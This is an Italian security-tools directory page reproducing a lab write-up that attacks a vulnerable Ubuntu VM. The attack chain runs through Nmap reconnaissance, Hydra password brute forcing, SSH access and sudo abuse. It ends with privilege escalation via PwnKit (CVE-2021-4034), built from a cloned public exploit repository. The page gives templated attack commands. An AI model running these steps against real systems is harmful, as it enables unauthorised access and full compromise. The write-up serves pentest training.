Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
ubuntu-privesc-lab — Workflow completo di penetration testing: brute force delle credenziali, accesso SSH ed escalation dei privilegi (CVE-2021-4034) | Kitploit
Strumenti/GitHubGitHub/vaibhavkrishna12004/ubuntu-privesc-lab
Escalation di PrivilegiRicognizioneMappatura della ReteAttacchi alle PasswordScansione PorteAnalisi delle VulnerabilitàExploitPenetration TestingConfigurazione Errata

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Apprendimento e Formazione
Lab e Pratica
GitHubvaibhavkrishna12004/ubuntu-privesc-lab

ubuntu-privesc-lab

Workflow completo di penetration testing: brute force delle credenziali, accesso SSH ed escalation dei privilegi (CVE-2021-4034)

Vedi Repository
4 mesi faNon ancora revisionato

ubuntu-privesc-lab

Flusso di lavoro completo di penetration testing: brute force delle credenziali, accesso SSH ed escalation dei privilegi (CVE-2021-4034)

PANORAMICA

Questo progetto dimostra un flusso di lavoro completo di penetration testing contro una macchina virtuale Ubuntu vulnerabile. La catena di attacco include ricognizione, brute force delle credenziali, accesso iniziale ed escalation dei privilegi utilizzando molteplici tecniche.

STRUMENTI UTILIZZATI

Nmap Hydra SSH Git CVE-2021-4034 (PwnKit)

RICOGNIZIONE

La ricognizione è stata condotta utilizzando Nmap, che ha rivelato il numero di host aperti nella rete specifica (wifi). nmap < Network IP 0/24 > : Questo ha rivelato il numero di host attivi e il loro indirizzo MAC. Ricognizione per l'individuazione della VM 1

Come osservato, la VM era in esecuzione in ORACLE VIRTUAL BOX; abbiamo capito che questa era la nostra VM vulnerabile e l'IP come segue.

Ricognizione per la VM 2

Ulteriori scansioni hanno rivelato porte aperte vulnerabili rilevate per l'attacco.

EXPLOIT PRIMARIO

Utilizzando ciò, ho tentato con successo un attacco di brute force delle credenziali con l'aiuto di Hydra hydra -l < USERNAME > oppure -L < File.txt > -p < PASSWORD > oppure -P < File.txt > < TARGET IP > < PORT >

Hydra per la VM vulnerabile

Questo exploit della password riuscito ci ha portato a utilizzare le credenziali anche per l'exploit della porta SSH.

ssh < USERNAME@TARGET IP > Password < password dell'exploit >

Exploit SSH tramite credenziali ottenute dalla password

Questo ci ha dato l'accesso iniziale al nostro sistema vittima. Inoltre, la errata configurazione di sudo ci ha concesso l'accesso completo come root sudo -l : (ALL : ALL) ALL

L'escalation è avvenuta tramite sudo su

EXPLOIT SECONDARIO

Abbiamo continuato a sfruttare il sistema vittima con l'aiuto di "Pwnkit CVE-2021-4034".

PwnKit (CVE-2021-4034) è una vulnerabilità di sicurezza critica scoperta all'inizio del 2022 dal team di ricerca di Qualys, che colpisce il framework Polkit sui sistemi Linux. È una falla di escalation locale dei privilegi (LPE) che consente a qualsiasi utente standard e non privilegiato di ottenere pieni privilegi di root (accesso amministrativo) su un sistema. La vulnerabilità esiste fin dall'introduzione di Polkit nel 2009 ed è considerata "banale" da sfruttare, rendendola estremamente pericolosa.

Common Vulnerabilities and Exposures (CVE) è un elenco standardizzato e pubblicamente divulgato di vulnerabilità ed esposizioni di cybersecurity nel software e nell'hardware.

INSTALLAZIONE DI CVE-2021-4034 ED EXPLOIT DELLA VM

Per prima cosa, ho confermato che il sistema target era potenzialmente vulnerabile controllando la presenza e i permessi di pkexec: which pkexec output: ls -la /usr/bin/pkexec Il binario aveva il bit SUID impostato, indicando che viene eseguito con privilegi di root, rendendolo un bersaglio valido per lo sfruttamento.

Preparazione dell'ambiente

Per compilare l'exploit, sono stati installati gli strumenti necessari: sudo apt update sudo apt install git build-essential -y Questo ha garantito che il sistema avesse il compilatore e le dipendenze necessarie. Se l'apt del sistema ha processi in background in esecuzione, terminarli.

Trasferimento / Ottenimento del codice dell'exploit

L'exploit è stato clonato direttamente sulla macchina vittima: cd /tmp git clone https://github.com/berdav/CVE-2021-4034.git cd CVE-2021-4034 L'uso di /tmp evita disordine e riflette un comportamento realistico di un attaccante. Installazione di CVE-2021-4034 Installazione di Git per il kit CVE

Compilazione dell'exploit

L'exploit è stato compilato usando: "make"

Questo ha generato l'eseguibile necessario per attivare la vulnerabilità.

Esecuzione dell'exploit

L'exploit è stato eseguito: ./cve-2021-4034

Verifica dell'escalation dei privilegi

Dopo l'esecuzione, l'accesso come root è stato confermato: whoami

Output: root

Sfruttamento dei privilegi e accesso alla VM

Questo exploit funziona perché pkexec gestisce in modo improprio le variabili d'ambiente, consentendo agli attaccanti di eseguire codice arbitrario con privilegi elevati.

CONCLUSIONE

Questo esercizio dimostra come un utente apparentemente con privilegi bassi possa ottenere il pieno controllo del sistema sfruttando una vulnerabilità nota come PwnKit (CVE-2021-4034). Combinando l'accesso iniziale tramite il compromesso delle credenziali con enumerazione e sfruttamento sistematici, è stato possibile ottenere l'accesso come root senza dipendere esclusivamente da errori di configurazione. Ciò evidenzia l'importanza critica di una gestione tempestiva delle patch e di pratiche di configurazione sicure. Anche una singola vulnerabilità trascurata può portare al completo compromesso del sistema, sottolineando la necessità di valutazioni di sicurezza continue e strategie di difesa in profondità.

Scarica lo strumento